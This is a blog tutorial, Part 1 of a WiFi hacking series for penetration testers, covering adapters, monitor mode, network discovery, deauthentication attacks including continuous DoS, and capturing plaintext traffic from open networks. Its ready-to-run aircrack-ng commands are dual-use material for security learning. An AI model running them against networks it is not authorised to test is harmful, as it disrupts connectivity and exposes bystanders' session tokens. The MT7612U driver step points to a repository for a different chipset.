WiFi Hacking 101: Breaking Into Wireless Networks (Part 1)

Table of contents

👋 Introduction

Hey everyone!

Last week I spent two days in a WiFi security course taught by @OscarAkaElvis (creator of airgeddon). Hands-on training, proper hardware, and an instructor who actually knew his stuff. I learned more about 802.11 exploitation in those two days than I had in years of reading blog posts and documentation.

Here’s what surprised me most. WiFi hacking isn’t some black magic reserved for elite hackers. The fundamentals are straightforward. The tools are mature and well-documented. The attack vectors are proven and reproducible. What was hard ten years ago is now point-and-click with the right hardware and tools.

But there’s a catch. Nobody teaches this systematically. You find scattered blog posts about deauth attacks. YouTube videos showing WPA cracking without explaining why it works. Tools documentation that assumes you already understand 802.11 fundamentals.

That’s why I’m writing this. I want to share what I learned in a way that actually makes sense. Start with why WiFi is such a massive attack surface. Cover the fundamentals you need to understand the attacks. Explain the hardware requirements. Show you how to set up your testing environment properly. Then walk through the attack techniques step by step.

This is Part 1, covering fundamentals, hardware, setup, and basic attacks. The advanced stuff (WPA/WPA2 cracking, PMKID attacks, WPS exploitation, WPA3, and enterprise networks) comes next.

If you’ve ever wanted to understand WiFi hacking but found it overwhelming, this is your starting point.

Let’s break some WiFi 👇

📡 Why WiFi Security Matters

Wireless networks are everywhere, broadcasting constantly to anyone within range. Unlike wired networks requiring physical access, WiFi extends beyond walls. Park outside an office building and you can see dozens of potential entry points.

The security models are fundamentally flawed. WEP was broken in 2001. WPA2 (still the most common standard) has been compromised via KRACK attacks, PMKID extraction, and implementation bugs. Even WPA3 suffered from Dragonblood attacks within a year of release.

Organizations treat WiFi as an afterthought. Default passwords on access points. WPS enabled. Weak PSKs. No client isolation. Meanwhile, they invest heavily in firewalls and IDS/IPS while the wireless network sits misconfigured since initial setup.

The attack vectors are practical. Capture a WPA2 handshake and crack it offline. No rate limiting. No account lockouts. Just your GPU and a wordlist. The barrier to entry is low: a $20-50 adapter, free open-source tools, and well-documented techniques.

This is why every pentester needs to understand WiFi security. It’s often the easiest way into a network.

🔧 Essential Hardware

You can’t hack WiFi with any random adapter. Your laptop’s built-in WiFi card probably won’t cut it. You need hardware that supports monitor mode and packet injection.

Monitor mode lets your adapter capture all wireless traffic in range, not just traffic directed to your MAC address. This is how you see handshakes, deauth frames, beacon frames, everything happening on the network.

Packet injection lets you send arbitrary 802.11 frames. This is critical for deauth attacks, ARP replay attacks, and many other techniques. Without injection capability, you’re severely limited in what attacks you can perform.

Recommended Adapters

ALFA AWUS036ACH ($40-50) - Industry standard. Realtek RTL8812AU chipset, dual-band 2.4/5GHz, excellent range. Monitor mode and injection work out of the box. This is what you’ll see in every WiFi security course.

ALFA AWUS036ACM ($45-55) - Better for advanced attacks. MediaTek MT7612U chipset with superior injection performance. Get this if you’re serious about WiFi testing.

TP-Link TL-WN722N v1 ($20-30) - Budget option. Atheros AR9271, single-band 2.4GHz only. Critical: only v1.x works, v2/v3 don’t support injection.

Panda PAU09 N600 ($30-40) - Ralink RT5572, reliable dual-band alternative.

Key Considerations

Chipset matters more than brand. Avoid Broadcom (poor Linux support), Realtek RTL8188EU (no injection support), and Intel (limited monitor mode).

External antennas extend range dramatically. Standard adapters work for close-range testing within 10-50 meters. Need to test from farther away? Get an adapter with RP-SMA connector and add a directional antenna. Suddenly you’re pulling networks from 300+ meters away.

Driver Installation

# Note: Drivers may break after kernel updates - reinstall if needed

# For RTL8812AU (ALFA AWUS036ACH)
git clone https://github.com/aircrack-ng/rtl8812au.git
cd rtl8812au
make
sudo make install

# For MT7612U (ALFA AWUS036ACM)
# Usually works out of the box with mt76x2u driver
# If not, install from source
git clone https://github.com/ivanovborislav/rtl8812au.git
cd rtl8812au
make
sudo make install

# Verify your adapter is recognized
iwconfig
# You should see your wireless interface (usually wlan0, wlan1, wlx...)

📻 WiFi Fundamentals

You need to understand the basics of how WiFi works before you can break it. This isn’t theory for the sake of theory. These concepts directly relate to exploitation.

Bands and Channels

WiFi operates on two main frequency bands. The 2.4 GHz band uses channels 1-13 (US uses 1-11), with each channel being 20 MHz wide. Channels overlap, and only 1, 6, and 11 are non-overlapping. You get better range but worse speed. It’s more crowded because everyone uses 2.4 GHz, and legacy devices only support this band.

The 5 GHz band has many more channels (36, 40, 44, 48, and up). It’s less crowded with better throughput, but shorter range and less wall penetration. Modern high-speed networks require 5 GHz.

Why this matters for attacks: you need to target the right band and channel. Your adapter must support the band the target network uses. Most home networks are still 2.4 GHz. Enterprise networks often use both.

Operating Modes

WiFi adapters operate in different modes. Managed mode is the default: normal client mode where you connect to access points like a regular device. Monitor mode is promiscuous mode for WiFi, capturing all traffic on the channel, not just traffic for your MAC address. This is essential for packet capture and analysis. Master mode makes your adapter act as an access point, used for Evil Twin attacks. Ad-hoc mode enables direct device-to-device communication without an access point.

Virtual Interfaces (VIF)

Modern drivers support multiple virtual interfaces on one physical adapter. You can run monitor mode while staying connected to a network.

# Create virtual monitor interface
iw dev wlan0 interface add mon0 type monitor
# wlan0 stays in managed mode, mon0 captures traffic

Note: VIF support varies by driver. If you hit issues, use single-interface mode.

Authentication and Encryption

Open (OPN): No auth, no encryption. Traffic in plaintext. Common in public spaces.

WEP: Deprecated in 2004, completely broken. Crackable in minutes.

WPA/WPA2-PSK: Standard for home/small business. Security depends on passphrase strength.

WPA2-Enterprise (802.1X): RADIUS authentication, individual credentials. Common in corporate environments.

WPA3: Latest standard with improved key exchange (SAE), forward secrecy, and offline attack protection. Low adoption, vulnerable to Dragonblood attacks.

🎯 Setting Up Your Testing Environment

You’ve got your hardware. Time to configure your environment properly.

Enable Monitor Mode

# Kill processes that might interfere
sudo airmon-ng check kill

# Enable monitor mode on your interface
sudo airmon-ng start wlan0

# This creates a monitor interface (usually wlan0mon)
# Verify it's in monitor mode
iwconfig

Test Packet Injection

Packet injection is critical. Test it before attempting attacks.

# Install aireplay-ng (part of aircrack-ng suite)
sudo apt install aircrack-ng

# Test injection on your monitor interface
sudo aireplay-ng --test wlan0mon

# Successful output looks like:
# Injection is working!
# Found X APs

If injection fails:

• Check driver installation
• Verify chipset supports injection
• Try a different USB port (USB 2.0 vs 3.0 can matter)
• Check dmesg for errors: dmesg | tail -50

Channel Hopping

Monitor mode captures traffic on one channel at a time. To see all networks, you need to hop between channels.

# Hop through all 2.4 GHz channels
sudo airodump-ng wlan0mon

# Hop only on specific channels (1, 6, 11 - the non-overlapping ones)
sudo airodump-ng --channel 1,6,11 wlan0mon

# Lock to a specific channel (important when capturing handshakes)
sudo airodump-ng --channel 6 wlan0mon

Organize Your Captures

Create a dedicated directory structure for your captures:

mkdir -p ~/wifi-testing/{captures,wordlists,handshakes,results}

# When capturing, save to organized directories
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w ~/wifi-testing/captures/target_network wlan0mon

🔍 Reconnaissance and Network Discovery

Now that your adapter is in monitor mode, time to see what networks are around you.

Basic Network Discovery

# Scan all networks in range
sudo airodump-ng wlan0mon

Key fields:

• BSSID: AP MAC address
• PWR: Signal strength (closer to 0 = stronger)
• CH: Channel
• ENC: Encryption (OPN, WEP, WPA, WPA2, WPA3)
• AUTH: Authentication method (PSK, MGT, OWE)
• ESSID: Network name

Bottom section shows connected clients and their probe requests (networks they’re looking for).

Focus on a Target Network

Once you identify a target, focus your capture on that network:

# Lock to the target's channel and BSSID
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# -c 6: Lock to channel 6
# --bssid: Target network's MAC address
# -w capture: Save to capture-01.cap, capture-01.csv, etc.

Identify Hidden Networks

Some networks hide their SSID (don’t broadcast the network name in beacons). They show up as <length: X> in airodump-ng.

How to reveal hidden SSIDs:

When a client connects to a hidden network, it sends the SSID in probe request frames. Capture these frames to reveal the name.

# Monitor for probe requests
sudo airodump-ng --showack wlan0mon

# Or force a client to reconnect (deauth attack - covered next)
# This causes the client to send a probe request with the SSID

💥 Basic Attack Techniques

Let’s start with the fundamental attacks every WiFi pentester needs to know.

Deauthentication Attacks

Deauth attacks disconnect clients from a network. They’re one of the most versatile WiFi attack primitives.

How it works: 802.11 management frames like deauth frames are unauthenticated in WPA/WPA2. You can spoof them. Send deauth frames claiming to be from the access point, and clients disconnect.

Perform a deauth attack:

# Deauth all clients from a network
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# --deauth 10: Send 10 deauth frames
# -a: Target access point BSSID

# Deauth a specific client
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

# -c: Target client MAC address

What you’ll see:

Clients disconnect. They usually reconnect within seconds. If you’re running airodump-ng, you’ll see the “WPA handshake” message when the client reconnects. This handshake is what you need for WPA/WPA2 cracking (covered in Part 2).

Continuous deauth (DoS):

# Send deauth frames continuously (0 = infinite)
sudo aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF wlan0mon

# Stop with Ctrl+C

Management Frame Protection (MFP)

WPA3 and newer WPA2 implementations support 802.11w Management Frame Protection. This protects management frames (like deauth) from spoofing.

How to detect MFP:

# Check airodump-ng output for "MFP" in capabilities
sudo airodump-ng wlan0mon

# Or parse beacon frames with Wireshark
# Look for RSN Information Element with MFP capability

If MFP is enabled: Deauth attacks won’t work. You can’t disconnect clients. This significantly reduces your attack surface. However, MFP adoption is still low. Most networks don’t have it enabled.

Open Network Exploitation

Open networks (OPN) have no encryption. All traffic is plaintext. This is the easiest target.

Connect to open networks:

# Stop monitor mode
sudo airmon-ng stop wlan0mon

# Connect to the open network
sudo nmcli dev wifi connect "Network_Name"

Capture and analyze traffic:

# Capture in monitor mode
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w open_network wlan0mon

# Analyze with Wireshark
wireshark open_network-01.cap

You’ll see HTTP requests, cookies, session tokens, DNS queries, and unencrypted protocols. While most sites use HTTPS, you’ll still find plaintext traffic from legacy HTTP sites, poorly-coded mobile apps, IoT devices, and printers.

OWE (Opportunistic Wireless Encryption)

OWE is the modern replacement for open networks. Provides encryption without authentication. Protects against passive eavesdropping while keeping the “no password required” convenience.

How to identify OWE networks:

# Look for "OWE" in the AUTH column of airodump-ng
sudo airodump-ng wlan0mon

OWE networks appear open but encrypt traffic. You can’t simply capture plaintext traffic. However, OWE doesn’t prevent Evil Twin attacks (covered in Part 2).

Traffic Interception with Wireshark

Captured packets need analysis. Wireshark is your tool.

Open captures:

# Launch Wireshark
wireshark capture-01.cap

Key Wireshark filters:

eapol                           # WPA handshakes
wlan.fc.type_subtype == 0x0c    # Deauth frames
wlan.fc.type_subtype == 0x04    # Probe requests
wlan.addr == aa:bb:cc:dd:ee:ff  # Filter by BSSID

Export objects via File -> Export Objects -> HTTP to extract transferred files.

🎯 Key Takeaways

Hardware matters. Get an adapter that supports monitor mode and packet injection. The ALFA AWUS036ACH is the industry standard. Don’t waste time fighting with unsupported hardware.

Understanding the fundamentals (bands, channels, operating modes, authentication methods) directly informs your attack strategy. These aren’t academic concepts.

Deauth attacks are your Swiss Army knife. They force handshake captures, test DoS resilience, and prepare for Evil Twin attacks. They work on most networks because Management Frame Protection adoption is still low.

Monitor mode and packet injection are non-negotiable. Test injection before attempting attacks. If it doesn’t work, troubleshoot your drivers and hardware immediately.

Wireshark is essential. Captured packets tell the whole story through EAPOL frames, probe requests, and beacon frames. Learn the filters.

---

That’s it for Part 1!

WiFi security testing is more accessible than ever. The hardware is affordable. The software is free and well-maintained. The techniques are proven and reproducible. What separates successful WiFi pentesters from unsuccessful ones is understanding the fundamentals and knowing how to use the tools effectively.

Practice on your own networks first. Set up a test access point. Capture your own handshakes. Perform deauth attacks against your own devices. Understand what works and what doesn’t before attempting client assessments.

Part 2 will cover the advanced attacks: cracking WPA/WPA2, PMKID extraction, WPS vulnerabilities, WPA3 Dragonblood, enterprise network exploitation, Evil Twin attacks, and captive portal bypasses.

Thanks for reading, and happy hunting!

— Ruben

Other Issues

Deserialization Attacks: When Objects Become Weapons

Previous Issue